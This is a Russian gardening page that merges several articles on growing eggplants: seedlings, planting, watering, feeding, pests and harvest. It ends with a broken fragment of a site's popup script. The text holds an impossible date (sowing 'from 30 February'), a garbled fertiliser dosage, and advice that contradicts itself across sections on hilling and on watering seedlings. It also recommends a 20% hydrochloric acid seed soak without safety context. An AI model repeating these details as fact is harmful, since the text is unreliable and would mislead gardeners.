3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как ухаживать за баклажанами в открытом грунте

Как успешно вырастить баклажаны в открытом грунте: особенности выращивания и ухода

У этой овощной культуры много особенностей, ее не так просто вырастить, особенно в прохладном климате. Читайте на Rblogs.ru полезную информацию по успешному выращиванию баклажанов в открытом грунте: посев семян, высадка рассады на грядки, правильный уход и сроки сбора урожая.

Как вырастить рассаду баклажанов

Рассаду баклажанов для открытого и защищенного грунта выращивают одинаково. В южных районах семена высевают уже в феврале, а в нечерноземной зоне – во второй половине марта. В выборе срока огородники обычно ориентируются на томаты и посев проводят на 10 дней раньше, чем начинают готовить помидорную рассаду.

Подготовка и посев семян

Баклажаны до массового цветения растут очень медленно, поэтому в Подмосковье на рассаду их лучше всего высевать с 30 февраля по 10 марта, предварительно прорастив семена во влажной тряпочке. Ориентировочно – за два месяца до предполагаемой высадки в открытый грунт.

Как посеять семена на рассаду:

  1. Наклюнувшиеся семена высевают в ящик с питательной смесью на глубину 1,5–2 см.
  2. Затем почву хорошо поливают, дают стечь лишней влаге.
  3. Ящик помещают в теплое место (температура около 25 °C). Ни в коем случае нельзя ставить его на батарею центрального отопления, иначе семена высохнут или просто сварятся.
  4. Чтобы не пересыхал верхний слой, ящик накрывают стеклом или пленкой.
  5. После появления первых проростков, не снимая укрытия, ящик переносят в светлое, более прохладное место (около 18 °C).

Всходы обычно появляются на 4-5-й день, а при посеве сухими семенами – лишь на 8-10-й.

Когда и как пикировать

При появлении двух настоящих листочков сеянцы обязательно пикируют в отдельные стаканчики (горшочки), объем которых должен быть не менее 200 мл, а высота 7-10 см

При выращивании рассады для защищенного грунта используют горшочки большого объема (500-700 мл).

Сеянцы рекомендуют пересаживать в горшочки вместе с большим комом земли, так как корни у баклажанов слабые и растения потом долго болеют.

Как ухаживать за рассадой: температура, свет, полив и подкормка

До появления всходов необходимо поддерживать температуру 25-28 °C, затем пять-шесть дней после всходов днем 16-18, ночью 12-14, в солнечную погоду 22-28, в пасмурную – 18-20 °C. Нельзя допускать пересыхания земли и высыхания горшочков!

При более низкой температуре растения плохо развиваются, а при более высокой – изнеживаются и перерастают.

В феврале и в первой половине марта дни еще темные, поэтому утром и вечером рассаду подсвечивают лампами дневного света, которые располагаю на расстоянии 15-30 см от растений. Можно пользоваться и обычными лампами накаливания, но размещать их нужно на расстоянии 60-70 см, чтобы не вызвать ожогов листьев.

Уход за рассадой баклажанов сводится в основном к поливам. Почва постоянно должна быть умеренно влажной. Поливают ее через три-пять дней. Делают это утром и только теплой водой (28-35 °C),

При необходимости растения подкармливают. Это можно сделать куриным пометом, разведенным водой в соотношении 1:10 – первый раз при появлении первых двух листочков, затем через каждые две недели.

У кого такой возможности нет, рекомендуют развести 125 г суперфосфата, 50 г мочевины и 30 г калийной соли в 10 л теплой воды и этой смесью поливать рассаду.

Баклажаны пикируют и высаживают на постоянное место без заглубления корневой шейки, это не томаты, которые можно закапывать до половины стебля. Поэтому при выращивании рассады нужно следить, чтобы она не вытягивалась, а росла коренастой, с толстым стеблем.

Стандартная рассада, от которой можно ожидать хорошего урожая, высотой 10-12 см, с 5-7 настоящими листьями, толстым стеблем и хорошо развитой корневой системой, густо оплетающей ком земли. Такая рассада легко выходит из стаканчиков и горшочков без повреждения корней.

Так выглядит хорошая рассада баклажанов

Как сажать баклажаны в открытый грунт рассадой

Через 55-65 дней, когда у рассады образуется пять-семь настоящих листьев, их высаживают в грунт.

Место и почва

С осени выбирают на участке место, где будут в дальнейшем расти баклажаны, и перекапывают там почву. Оно должно быть солнечным, с хорошо дренированной плодородной землей (с pH от 6,3 до 6,8).

Весной под баклажаны вносят удобрения на 1м 2 :

  • 2/3 ведра перепревшего навоза или компоста;
  • 2 ст. ложки суперфосфата;
  • ложку сульфата калия;
  • 1 стакан просеянной золы.

Перечисленные удобрения можно заменить 2 ст. ложками полного комплексного удобрения для пасленовых.

Сроки посадки

Баклажаны любят влагу и тепло, не переносят даже легких заморозков. При температуре ниже 15 °C они перестают расти и погибают.

Баклажаны чувствительны и к колебаниям температуры и влажности воздуха и почвы, поэтому не спешите высаживать рассаду в открытый грунт. Ориентировочные сроки 20–30 мая. В зависимости от климатических условий региона, они могут быть сдвинуты до начала-середины июня.

Чем обработать баклажаны от вредителей

Баклажанами любят «лакомиться» медведки, слизни, щелкуны, колорадские жуки, тля. Большой ущерб причиняют и болезни — макроспориоз, столбур, гнили.

Для профилактики за день-два до высадки рассады в открытый грунт желательно каждую лунку полить водой, добавив в нее немного нашатырного спирта.

Многие огородники поливают лунки крепким раствором марганцовки.

От листогрызущих вредителей растения обрабатывают медным купоросом, карбофосом, битоксибациллином.

Посадка рассады баклажанов в открытый грунт

Схема посадки: делают лунки глубиной 10-15 см и располагают их в шахматном порядке через каждые 45 см (в 2 ряда).

За 1-2 ч до высадки рассады в грунт ее хорошо поливают.

В лунку дополнительно кладут горсть золы и перегноя, перемешивают с землей, обильно поливают водой.

Чтобы высадить рассаду баклажанов в открытый грунт, растение осторожно выбивают из горшочка с комом земли, чтобы не повредить корни. Сажают ее на 1 см глубже, чем она росла.

После высадки рассады растения поливают и, чтобы не образовалась почвенная корка, подсыпают сухую землю. На гряду ставят дуги высотой около 1 м и накрывают их пленкой. Если стоит солнечная погода, в первые дни посадки притеняют – на пленку набрасывают ткань, а с торцов пленку приоткрывают для проветривания.

В случае заморозков посадки надо дополнительно укрыть.

Баклажаны не любят сквозняков, но и не переносят перегрева. Тогда у них опадают бутоны и цветы, поэтому днем пленку в теплые дни открывают.

Ночью посадки закрывают, и лишь в теплые ночи, когда не предвидится дождя и температура воздуха 15-16 °C, баклажаны можно оставить открытыми.

Уход за баклажанами в открытом грунте

При выращивании баклажанов обратите внимание, что им требуется особый уход и температурный режим.

Как и сколько поливать

В первые дни высаженную рассаду баклажанов поливают ежедневно, а затем – раз в неделю и только теплой водой, но обильно, чтобы влага проникла на глубину не менее 30-40 см.

В период плодоношения растениям нужно много воды. В жаркие дни баклажаны поливают через день. От недостатка влаги опадают цветы, рост и развитие кустов приостанавливаются.

Почву обязательно нужно рыхлить, не допуская образования корки. Растения не окучивают.

Чем подкормить баклажаны после высадки в грунт

Независимо от заправки почвы провожу жидкие подкормки, сочетая их с поливом.

Сразу после высадки в открытый грунт растениям нужен азот, иначе кусты будут низкими и плодоношение задержится. Однако баклажаны не переносят высоких доз удобрений.

Первый раз подкармливают баклажаны через 2-3 недели после высадки настоем коровяка, который бродит 2-3 дня (1 стакан на 10 л воды).

Коровяк процеживают, а после подкормки почву обязательно рыхлят.

Можно использовать 5-7-дневный настой птичьего помета (1:15) или настой травы (бродит 3-4 дня, после процеживания разводят в 2 раза водой).

Уборка урожая

Плоды собирают, пока они еще не полностью созрели. В это время семена у них мелкие, мякоть нежная, без горечи. В средней полосе России первые плоды в открытом грунте обычно собирают после 20 июля.

Баклажан обычно достигает зрелости через два-три месяца после посадки, точнее, через 60-80 дней, в зависимости от сорта, который вы выращиваете, и климата. При созревании плоды становятся упругими и блестящими.

Баклажаны лучше срезать секатором или острыми садовыми ножницами, так как плодоножки у них одревесневшие и очень крепкие.

Если осенью на растениях осталось много мелких недозрелых плодов, кусты можно подкопать и поместить в теплицу. В случае похолодания прикройте их пленкой и не забывайте поливать. Плоды будут расти и увеличиваться в размере.

В сухом помещении баклажаны хранятся плохо – сморщиваются. Их лучше хранить в полиэтиленовом открытом пакете в прохладном месте

Выращивание и уход за баклажанами в открытом грунте

Баклажан – это многолетнее травянистое растение, относящееся к роду Паслен. Его с давних пор выращивают садоводы на своих приусадебных участках. Сначала овощ сажали только в теплицах, но благодаря селекционерам появились новые гибриды, устойчивые к российскому климату. Чтобы вырастить баклажан в открытом грунте, требуются определенные навыки. Благодаря правильному подходу к этой культуре, можно получить высокий урожай.

Куст баклажана в высоту достигает 150 см. Листья у него крупные, очередные, шершавые, зеленые, но могут иметь и фиолетовый отлив. Цветки в диаметре достигают 2–2,5 см, фиолетового окраса, собраны в полузонтиковидные соцветия или одиночные. Цвести начинает в июле и заканчивает в сентябре.

Плод – грушевидная, цилиндрическая или округлая ягода крупного размера длиной до 70 см и весящая около одного килограмма. Обычно она глянцевого или матового темно-фиолетового цвета, в которой находятся мелкие семена светло-коричневого окраса, созревающие в начале осени.

В условиях средней полосы чаще всего выращивают следующие сорта баклажанов:

Сорт Описание
Валентина Пурпурно-черные плоды, вытянутые книзу, обладающие исключительным вкусом. Сорт устойчив к вирусу табачной мозаики
Фиолетовое чудо Это раннеспелый гибрид, плоды у которого блестящие, фиолетового цвета и весящие около 350 г. Мякоть зеленоватая без горечи. Этот сорт устойчив к увяданию
Чешский ранний Это раннеспелый сорт, отличающийся высокой урожайностью, с мощными невысокими кустами и гладкими, темно-фиолетовыми плодами с зеленовато-белой мякотью

Баклажан является самым теплолюбивым овощем семейства Пасленовые. Он не любит заморозки и в условиях климата России его выращивают только через рассаду. У скороспелых сортов срок созревания составляет 100 дней с момента появления ростков, а у позднеспелых — 150 дней. Баклажаны сажают на рассаду в начале или середине марта, а в открытый грунт пересаживают, когда земля прогреется до +18 градусов, при этом всходам должно быть не меньше 75 дней.

Чтобы вырастить рассаду, сначала подготавливают семена. Они должны быть второго года хранения, так как в этом случае они более жизнеспособны. Семена на трое суток замачивают в 3%-м растворе гумата калия, а потом по одному высаживают в отдельные горшки с влажной почвой, состоящей из следующих компонентов:

  • верховой торф – 60%;
  • перегной – 20%;
  • дерновая земля – 10%;
  • опилки или песок – 5%;
  • биогумус – 5%.

Семена заглубляют в грунт на 1 см, почву уплотняют, а горшки накрывают пленкой и ставят в теплое место с температурой +25…+26 градусов. Через 10–15 дней появляются всходы. Пленку убирают, а освещенность и температуру повышают.

Уход за рассадой не потребует значительных усилий. Почву не поливают до тех пор, пока на рассаде не появятся бутоны. Также в этот период нужно повысить влажность воздуха. Если грунт питательный, то удобрение вносить не нужно, а бедную почву нужно подкормить. Для этого ее поливают слабым раствором кристаллина. Чтобы рассада не вытягивалась, ей должно хватать света.

За 2 недели до высадки ростков в открытый грунт их начинают постепенно закаливать. Для этого температуру содержания снижают, доведя ее в итоге до +14…+15 градусов. Последние 2–3 дня сеянцы ставят на целый день на свежий воздух, а если во дворе тепло, то рассаду оставляют на улице и на всю ночь. Благодаря такой закаливающей процедуре повышается устойчивость саженцев к ветру, они лучше приспосабливаются к прямым солнечным лучам и прохладной температуре.

Как ухаживать за баклажанами, чтобы получить хороший урожай

Баклажаны являются капризной овощной культурой, которую нужно на протяжении всего сезона обеспечивать полноценной заботой и вниманием. Конечно, нельзя сказать, что выращивание растения — сверхсложный процесс, при должном старании все можно делать легко и быстро. Главное — знать, какие процедуры нужно осуществлять, и как правильно ухаживать за баклажанами на протяжении всего сезона выращивания.

Правила ухода и выращивания баклажанов летом

Полноценный и правильный уход за баклажанами летом поможет получить максимально вкусный, полезный, богатый урожай. Для этого необходимо выполнять ряд мероприятий, каждое из которых имеет определенную функцию. Каждая процедура важна, и поэтому проводить ее нужно качественно. Рассмотрим более подробно, что нужно делать с овощной культурой.

Полив

Чтобы баклажаны нормально росли, развивались и плодоносили, им нужно обеспечить правильный и полноценный полив. Данную культуру можно назвать влаголюбивой, но при этом она не потерпит излишков влаги и заболачивания. А если вносить влагу в недостаточном количестве, то растения будут плохо расти, цветки и завязи отпадут.

Основные правила полива баклажанов в открытом грунте и в теплице:

  • После высадки рассады на постоянное место первый полив производится не ранее чем через 5-7 дней.
  • Вносить влагу можно исключительно под корень, нельзя допускать попадания воды на стебель, листья, цветки, плоды!
  • Лучше всего выполнять процедуру в утреннее или вечернее время.
  • Воду нужно использовать исключительно теплую, оптимальная температура — 23-27 градусов. Использование менее теплой воды замедлит рост и плодоношение, а холодной воды (ниже 18 градусов) — очень негативно скажется на растениях. Оптимальный вариант — заранее налить воду в емкость (бочку, ванну), дать согреться и настояться.
  • Важно знать, как часто поливать баклажаны. Частота в первую очередь зависит от погодных условий: в жаркую и засушливую погоду вносить влагу нужно раз в 3-4 дня, а в дождливую, влажную или прохладную — раз в 7-9 дней.

Совет! Лучше всего поливать реже, но с большим количеством воды.

  • Полив баклажанов в теплице имеет одну особенность — после процедуры нужно обязательно открывать двери и окна, чтобы проветривать помещение, нельзя допускать чрезмерное переувлажнение воздуха, это может спровоцировать грибковые заболевания.
  • Норма полива в среднем — 5-7 литров под одно растение. Когда растения зацветут, и в период плодоношения растениям требуется немного больше воды.
  • Вода должна промочить грунт на глубину 20 сантиметров.
  • Почва под растениями должна быть всегда влажной, но не сырой и мокрой.
  • Важно соблюдать умеренность, нельзя заливать растения. Они не переносят застоя воды.
  • Наилучший способ внесения влаги — в бороздки. Для этого их необходимо сделать рядом с растениями.

Рыхление и прополка сорняков

Рыхление почвы вокруг баклажанов — обязательная процедура ухода за культурой. Ее нужно проводить только в том случае, если вы замульчировали грядку. Процедура препятствует появлению земляной корки, улучшает доступ кислорода к корням. Без рыхления корни будут страдать от недостатка кислорода, а также рядом с корневой системой будет спровоцировано размножение гнилостных инфекций. Рыхление сопровождается устранением сорняков.

Обратите внимание! Если даже очередная необходимость рыхления еще не наступила, но вы увидели сорную траву на грядке с овощами, то рекомендуется ее сразу же удалить.

Рыхлить землю нужно после полива или дождя, при этом вода должна полностью впитаться (оптимально делать это через несколько часов, а еще лучше на следующий день).

Глубина рыхления почвы вокруг баклажанов зависит от их стадии развития:

  • Молодые растение после пересадки — 4 или 5 см, глубже делать это не рекомендуется, так как можно повредить корешки.
  • В период бутонизации — 5-6 см.
  • После завязывания плодов — 7-8 см, ни в коем случае нельзя рыхлить глубже восьми см, иначе опять же можно повредить корешки.

Окучивание

Необходимо вместе с рыхлением осуществлять окучивание, то есть подгребать разрыхленную землю к основанию растения. Процедура по уходу улучшает и облегчает дыхание корневой системы, стимулирует рост новых корешков, позволяет влаге более длительное время сохраняться в почве, сорная трава растет медленнее.

Окучивать баклажаны необходимо на высоту 5-7 сантиметров.

За весь сезон выращивания овощной культуры окучивание нужно произвести всего несколько раз (2-3 раза).

Подкормка

Подкормка баклажанов при выращивании в открытом грунте и в теплице помогает получить богатый, вкусный и хороший урожай. За весь сезон удобрения вносят 3 или 4 раза.

Подкармливать овощную культуру рекомендуется по следующей схеме:

  • Первая подкормка проводится через 14 дней после высадки рассады на постоянное место, она помогает растениям лучше прижиться и адаптироваться на новом месте. Отлично подойдет комплексное удобрение, например, «Фертика Люкс».
  • Вторая подкормка осуществляется в период бутонизации. В этот момент нужно использовать фосфорные и калийные удобрения. Например, можно поступить следующим образом: смешать аммиачную селитру (1 столовая ложка) и сульфат калия (1,5 аммиачная селитра). А потом, после полива жидкими удобрениями, порыхлить почву и равномерно внести суперфосфат в сухом виде (одна чайная ложка под одно растение).
  • Третья подкормка производится при появлении первых плодов, на данном этапе удобрять растения нужно азотом и фосфором. Например, можно использовать Амофоску (1,5 столовых ложки смешиваются с 10 литрами воды).
  • Четвертая подкормка — за 20-30 дней до сбора урожая рекомендуется использовать калийные и фосфорные удобрения. Например, можно смешать калийную соль и суперфосфат (по одной столовой ложке каждого вещества) и 10 литров воды, под одно растение — 200 мл удобрения.

Обратите внимание! Можно также использовать органические удобрения, чтобы подкормить баклажаны в открытом грунте или в теплице. Например, в период цветения можно полить растения раствором древесной золы (богат калием, полезными микроэлементами). Для приготовления раствора нужно смешать стакан золы и ведро воды, настоять десять дней.

Формирование баклажанов

Баклажаны не любят вмешательств, которые могут спровоцировать заболевания. Поэтому к формированию нужно относиться аккуратно.

Начинать нужно с того, что при высадке рассады на постоянное место, закопать колышек и сразу подвязать молодое растение к опоре (кроме штамбовых низкорослых сортов, — у них и так достаточно крепкие стебли, к тому же они имеют небольшую высоту). Благодаря этому, растение не обломается и не повредится под весом тяжелых плодов. Также для опоры можно использовать шпалеры по периметру грядки: натянуть проволоку параллельно ряду с растениями.

Проводить пасынкование баклажанов не обязательно. Однако при необходимости можно устранить неплодоносящие пасынки снизу и боковые побеги, которые при разрастании будут мешать формироваться первым цветкам, до первого бутона

Требуется своевременно убирать деформированные плоды, а также желтые листочки.

Как уже было отмечено выше, лишний раз баклажаны лучше не трогать, чтобы не травмировать. Прищипку верхушки и удаление побегов стоит проводить только в случае, если на кустике очень большое количество цветков. В этом случае производится прищипывание верхней части побега (прищипка) и удаление слабых побегов, оставляя примерно пять или семь самых крупных и хорошо развитых.

Благодаря такой несложной манипуляции можно получить более крупные плоды. А вот если вы хотите получить много баклажанов не очень больших размеров, то прищипывать верхушку не стоит.

Лечение и профилактика болезней, вредителей

При недостаточном уходе и неблагоприятных условиях выращивания баклажаны становятся легкой мишенью для вредителей и болезней.

Популярными болезнями баклажана являются фитофтороз, антракноз, гнили, вертициллезное увядание. Лучше предотвратить заболевание, чем потом лечить или и вовсе потерять растение. Для профилактики болезней можно проводить обработку растений в открытом грунте или в теплице примерно один раз в 2 недели. Для лечения и профилактики оптимально использовать биологические фунгициды, которые безопасны для человека и животных, и эффективны против вредителей баклажана, например, «Фитоспорин», «Глиокладин», «Планриз», «Гамаир», «Бактофит» и др. Опрыскивание нужно производить строго по инструкции к препарату.

Распространенными вредителями баклажанов являются белокрылка, медведка, колорадский жук, паутинный клещ, тля, слизни, трипсы. Для борьбы с ними и для профилактики используются инсектициды, например, «Фитоверм», «Битоксибациллин», «Басамил», «Лепидоцид», «Актофит» и др.

Опять же, чтобы не пришлось тратить свое время и ресурсы на лечение болезней и борьбу с вредителями баклажанов, рекомендуется качественно ухаживать за растением в открытом грунте и в теплице. Обязательно соблюдайте севооборот (то есть чередование культур во времени и пространстве), проводите профилактические обработки, не допускайте чрезмерного переувлажнения грунта и воздуха.

Защита от влажности в открытом грунте

Если выращивание баклажанов осуществляется в открытом грунте, то следует внимательно относиться к влажности (культура не любит повышенную влажность на надземной части). Если наблюдается затяжная влажная, дождливая погода, то очень рекомендуется укрыть грядку. Например, можно поставить дуги и натянуть на них агроволокно. Как только влажная погода пройдет, убрать дуги.

Поддержание температурного режима в теплице

Баклажаны являются очень теплолюбивыми культурами. Поэтому в южных регионах (например, Краснодарский край (Кубань), Северный Кавказ, Астраханская область и др.) ее, как правило, выращивают на грядках в открытом грунте. А в более северных (например, Средняя Полоса (Подмосковье), Сибирь, Урал, Ленинградская область и др.) — в теплице.

Если в открытом грунте контролировать температуру весьма трудно, то в теплице гораздо проще. Оптимальная t воздуха для выращивания культуры — 24-26 градусов. Очень важно поддерживать такую температуру для нормального роста и плодоношения. И особенно опасно, если температура опустится ниже 15 градусов: в таком случае растения перестанут развиваться, сбросят цветки, завязи.

Стимулирование опыления

Хоть овощная культура является самоопыляемой, в некоторых случаях опыление может происходить плохо. Поэтому можно помочь растениям и простимулировать этот процесс во время цветения.

Например, можно в утреннее время подойти к кустикам и аккуратно постучать по стебельку.

При выращивании тепличных баклажанов рекомендуется днем открывать теплицу, чтобы насекомые-опылители смогли попасть в нее и как бы «доопылить» растения.

Высадили баклажаны в открытый грунт и не знаете, как за ними ухаживать?

Рада приветствовать вас, уважаемые читатели и подписчики! Сегодня хочу похвастаться своими достижениями. С небольшой плантации «синеньких» собрала рекордный урожай. В этом мне помогли знания, почерпнутые из сети и специальной литературы. Поделюсь информацией о том, каким должен быть уход за баклажанами в открытом грунте, а о том, как их выращивать в теплице, можно почитать в этой статье.

Тепло и влажно

Собираясь перенести рассаду на постоянное место, дожидаются наступления тепла. Почва должна хорошенько прогреться. Я для высадки подбираю солнечные участки. Их готовлю еще с осени, внося удобрения.

После того, как ростки принялись, периодически рыхлю вокруг стеблей землю и осуществляю полив. У меня свои секреты.

  1. Первый раз увлажняю грунт не раньше чем через 5-6 дней после пересаживания сеянцев. Корневая система должны укрепиться.
  2. Не пользуюсь шлангом, «кланяюсь» каждому кусту. Заранее в бочку набираю воду. Только когда она прогреется на солнце, вечером аккуратно подливаю, стараясь не попасть на листья и стебель. Если есть возможность, установите систему капельного полива. Это станет прекрасным выходом из ситуации.
  3. Чтобы сократить себе работу, на следующий день землю слегка рыхлю. Тем самым уменьшается скорость испарения влаги.
  4. Поливаю «синенькие» раз в неделю. С наступлением жары периодичность сокращается. Тогда же поливать из шланга. В июле – августе у нас настолько жарко, что холодной вода не окажется в любом случае.

Удобрения

Овощ требователен к составу почвы. Любит легкую, хорошо удобренную, питательную. Но даже предварительная забота о составе грунта не заменит удобрений. Я подкормку делаю за лето 5-6 раз. Впервые – через две недели после высаживания рассады, когда корешки окончательно окрепнут. Стараюсь избегать минеральных добавок, в основном, использую органику. Но иногда в ход идут проверенные временем и соседями «рецепты».

  • После первой завязи на 10 литров теплой воды разводят 15 г аммиачной селитры, столько же суперфосфата и добавляют древесную золу.
  • Когда начнется плодоношение, чередуют посыпку золой с подкормкой жидкой болтушкой коровяка. С той же целью иногда использую настой сгнившей травы, который все лето стоит на солнце в бочке.
  • Ближе к осени хорошо усваивается сульфат кальция из расчета 1 ч. л. на 10 литров воды.
  • Органику (коровяк, куриный помет) тщательно дозируют. Не пытайтесь накормить «впрок». Усиленное питание никак не отразится на количестве плодов, но вызовет бурный рост побегов и листвы.

Борьба с насекомыми

Баклажаны относятся к семейству пасленовых. При соблюдении агротехники, хорошей вентиляции воздуха между растениями (нельзя загущать посадки), их выращивание беспроблемно. Тем не менее, среди насекомых находятся «любители» этого овоща.


  • Колорадский жук. В один год поступила неразумно, отведя место для картофеля рядом с «синенькими». Вредители сначала появились на картошке, откуда плавно перекочевали на соседнюю грядку. Теперь не допускаю подобных ошибок. Пока жука мало, собираю его вручную. Если процесс запущен, протравливаю специальными препаратами.
  • Паутинный клещ. Внимательно осматривайте изнаночную сторону листвы на предмет появления первых его признаков – тонких, выеденных линий. Для борьбы использую опрыскивание настоем чеснока или препаратом «Стрела» (что более эффективно).
  • Тля. Основные профилактические меры – распыление на листья жидкой болтушки золы.
  • Слизни. Объедают молоденькие побеги и листочки. Любят влажность. Но не перебираются через преграду вокруг стеблей: насыпанные песок, золу.

Средства от заболеваний

Выращивание овоща в открытом грунте сопряжено с риском развития болезней.

  • Черная ножка. Чаще поражает рассаду и взрослые тепличные растения. Профилактические меры – хорошая вентиляция, внесение древесной золы на поверхность почвы.
  • Мозаика. Названа так из-за общего вида характерных признаков: изменения окраски (появляется пятнистость листьев и плодов). Специфического лечения не существует. В один неудачный год мне пришлось убрать и сжечь все зараженные растения. Профилактику проводят, замачивая семена перед посевом в 20%-ном растворе соляной кислоты.
  • Гниль. В основном, развивается дождливым летом. На всех частях куста образуются очаговые изменения темного цвета с налетом. Пораженные растения уничтожают, когда установится сухая погода, проводят опрыскивание фунгицидами.
  • Столбур. Нападает на баклажаны открытого грунта. Болезнь проявляется в виде темно-фиолетовых пятен на зеленой массе, ломкости стеблей, деформации с последующим осыпанием завязей и цветов. Считается, что переносчиками выступают насекомые. Основные профилактические меры – прополка, рыхление, обработка химикатами.

Добавлю еще несколько слов. Баклажаны, выглядящие больными, не всегда таковыми на самом деле являются. Например:

  • Скрученные, маленькие и толстые плоды с плотной кожурой развиваются из-за нерегулярных поливов.
  • Опадание цветков и завязей может говорить о том, что растения «застудили».
  • Осветление листвы – о нехватке азота, ее вытягивание вверх – о недостатке фосфора.
  • Если листочки сворачиваются вовнутрь по краям – мало калия.

Относитесь к овощу со вниманием и заботой. Они окупятся сторицей!

На этом заканчиваю свой рассказ. Надеюсь, своим мнением вы поделитесь в комментариях. Особенно интересно узнать, как вы боретесь с болезнями. Часто ли сталкиваетесь с ними?

Мне сильно страдать от них не приходилось. А вот у соседки в дождливый год гниль забрала половину урожая.

Порекомендуйте статью друзьям в соцсетях. Может быть, он подскажут что-то толковое? До новых встреч!

6 важных правил ухода за баклажанами

Добавление статьи в новую подборку

Баклажаны – довольно капризная культура, поэтому при их выращивании нужно не только соблюдать главные принципы ухода, но и учитывать все тонкости. Мы подготовили для вас свод правил, которые должен знать каждый огородник, культивирующий это растение.

Так как в средней полосе России баклажаны в основном выращивают в теплице или под пленочным укрытием, в этой статье мы приведем советы по уходу за растениями, находящимися в защищенном грунте.

1. Правильный полив баклажанов

Грамотный полив – это уже половина успеха. Баклажанам нужно больше влаги, чем перцам. Поэтому не забывайте об этом, особенно если вы выращиваете две культуры в одном парнике. Корни баклажанов слабее, в результате чего они плохо транспортируют влагу к побегам. А при ее недостатке завязи и цветки опадают.

Баклажаны нужно поливать регулярно, но с количеством воды важно не переусердствовать

Но это не значит, что растения нужно заливать, в частности, сразу после посадки рассады. После «переезда» в парник растения поливают спустя 5 дней: в первые дни им хватает воды, так как рассаду сажают в предварительно политые лунки.

Регулярность полива баклажанов зависит от погоды. В облачные дни, когда земля долго остается слегка увлажненной, полив производят раз в 7-10 дней. А в знойную и засушливую погоду – раз в 3-5 дней.

При этом следует учесть, что баклажаны поливают только под корень (нельзя, чтобы листья намокали) и в утреннее время. При этом температура воды должна быть 25-28°С: при более низкой цветение задерживается.

После полива теплицу рекомендуется проветривать, чтобы не повышалась влажность воздуха.

2. Рыхление и окучивание

Недостаточно просто увлажнить почву, после каждого полива ее нужно рыхлить. Вокруг молодых растений – на глубину 4-5 см, во время появления бутонов и цветков – на 5-6 см, а после завязывания плодов – на 7-8 см. Глубже 8 см рыхлить не стоит, так как у баклажанов поверхностная корневая система, которую легко повредить.

Кроме того, после каждого рыхления растения окучивают на 5-7 см. Благодаря этому корни лучше дышат, влага дольше сохраняется в грунте, а сорняки замедляют свой рост.

Не забывайте своевременно рыхлить почву и окучивать баклажаны

3. Температурный режим

Наиболее оптимальная температура воздуха для баклажанов – 28-30°С. Но ничего страшного, если в теплице будет даже выше 35°С. А вот при опускании столбика термометра ниже 13°С растения перестают развиваться.

Чтобы контролировать температуру воздуха, установите в теплице 2 термометра: один – под крышей, а второй – прямо над поверхностью земли. Их показатели не должны отличаться более чем на 3°С.

Следите, чтобы температура воздуха в парнике была не менее 13 градусов

Если температура воздуха стремительно растет (а это особенно опасно в первые 3 дня после посадки рассады), ее необходимо снизить. Для этого нужно проветрить теплицу, затенить форточки и полить дорожки между грядками.

4. Формировка баклажанов

У большинства баклажанов побеги очень хрупкие, они легко ломаются под тяжестью плодов, поэтому сразу же после высадки рассады в грунт ее нужно подвязать к заранее вкопанному колышку.

Также можно установить шпалеру или натянуть проволоку над рядами кустов

Штамбовые компактные сорта подвязывать не нужно: у них более крепкие стебли, которые не достигают высокого роста.

Баклажаны не обязательно пасынковать, однако нужно своевременно удалять желтые листья и деформированные плоды. Также необходимо учесть, что нижние побеги, которые не плодоносят, могут оказаться полезными: в жару они защитят землю от пересыхания.

По поводу того, стоит ли прищипывать баклажаны, единого мнения нет. Вообще эти нежные растения лучше не травмировать, иначе они рискуют заболеть. Но если в конце сезона на кустах много очень цветков, верхушки можно прищипнуть и удалить слабые побеги, оставив на кусте 5-7 самых развитых. Это ускорит созревание плодов, которые вырастут весьма крупными.

Если же вы хотите полакомиться многочисленными, но некрупными баклажанами, то лучше обойтись без прищипки.

5. Подкормка баклажанов

При выращивании баклажанов за сезон проводят 3-4 подкормки

Первую подкормку рассады баклажанов проводят примерно через 2 недели после посадки. Важно, чтобы растения успели прижиться. При этом используют любое комплексное удобрение (например, Кемиру-люкс или Растворин).

Во время появления бутонов баклажаны подкармливают фосфорными и калийными удобрениями. Для этого 1 ст.л. сульфата калия и 1,5 ст.л. аммиачной селитры растворяют в 10 л воды, полученной жидкостью поливают растения, затем слегка рыхлят землю и насыпают туда гранулы суперфосфата – по 1 ч.л. под каждый куст.

Когда появятся первые плоды, растения подкармливают азотно-фосфорным удобрением. Используют 1,5 ст.л. амофоски на 10 л воды. Также во время цветения и плодоношения можно применять растворы коровяка, птичьего помета, древесной золы.

За 3-4 недели до сбора урожая под каждый куст баклажана рекомендуется вылить по 1 стакану питательного раствора, который готовят из 1 ст.л. суперфосфата, 1 ст.л. калийной соли и 10 л воды.

6. Защита от болезней

В целях профилактики опасных заболеваний соблюдайте следующие правила:

  • не допускайте перепад температур в теплице, а также сильного переувлажнения воздуха и почвы;
  • соблюдайте севооборот: баклажаны нельзя сажать каждый год в одну и ту же землю;
  • обрабатывайте растения фунгицидами.

Что же делать, если не удалось уберечь баклажаны от болезней? С недугами обычно справляются традиционными способами. От фитофтороза помогут такие препараты, как Консенто, Антракол или Квадрис, от серой гнили – Хорус или тот же Антракол.

Так выглядит некротическая пятнистость листьев баклажана

Однако вирусные болезни (например, табачную мозаику и некроз плодов) невозможно вылечить с помощью химических препаратов. В этом случае поможет только грамотная профилактика.

Ухаживайте за баклажанами правильно – и никакие болезни не будут вашим растениям страшны!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
